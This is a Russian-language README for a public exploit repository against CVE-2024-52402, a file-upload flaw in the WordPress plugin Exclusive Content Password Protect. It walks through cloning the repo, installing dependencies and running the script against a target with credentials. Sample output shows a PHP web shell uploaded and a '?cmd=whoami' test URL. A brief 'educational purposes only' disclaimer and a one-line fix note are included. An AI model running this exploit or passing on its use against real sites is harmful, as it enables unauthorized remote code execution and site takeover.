
Плагин WordPress Exclusive Content Password Protect <= 1.1.0 - уязвимость CSRF to Arbitrary File Upload
Этот эксплойт нацелен на уязвимость межсайтовой подделки запросов (CSRF) в плагине WordPress Exclusive Content Password Protect версии до 1.1.0 включительно. Данная уязвимость позволяет злоумышленнику загрузить веб-шелл на веб-сервер, что может привести к удаленному выполнению кода.
Для эксплуатации этой уязвимости необходимо указать URL целевого сайта WordPress, действительные имя пользователя и пароль WordPress. Скрипт эксплойта войдет на сайт WordPress и попытается загрузить веб-шелл.
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help показать это сообщение справки и выйти
-u, --url URL URL целевого сайта WordPress
-un, --username USERNAME
Имя пользователя WordPress
-p, --password PASSWORD
Пароль WordPress
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
Этот скрипт эксплуатирует уязвимость CSRF в плагине Exclusive Content Password Protect для загрузки веб-шелла на сервер WordPress. Однако он не выполняет CSRF-атаку напрямую; вместо этого он фокусируется на использовании функции загрузки файлов плагина для достижения эксплуатации.
Клонировать репозиторий
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
Установить зависимости
Убедитесь, что установлена библиотека requests:
pip install requests
Запустить скрипт Используйте следующую команду для запуска скрипта:
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
Чтобы устранить эту уязвимость, обновите плагин Exclusive Content Password Protect до последней версии, в которой эта проблема исправлена.
Данный скрипт предназначен только для образовательных целей. Несанкционированное использование этого скрипта против систем, на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Эксплойт от: Nxploit, Khaled alenazi.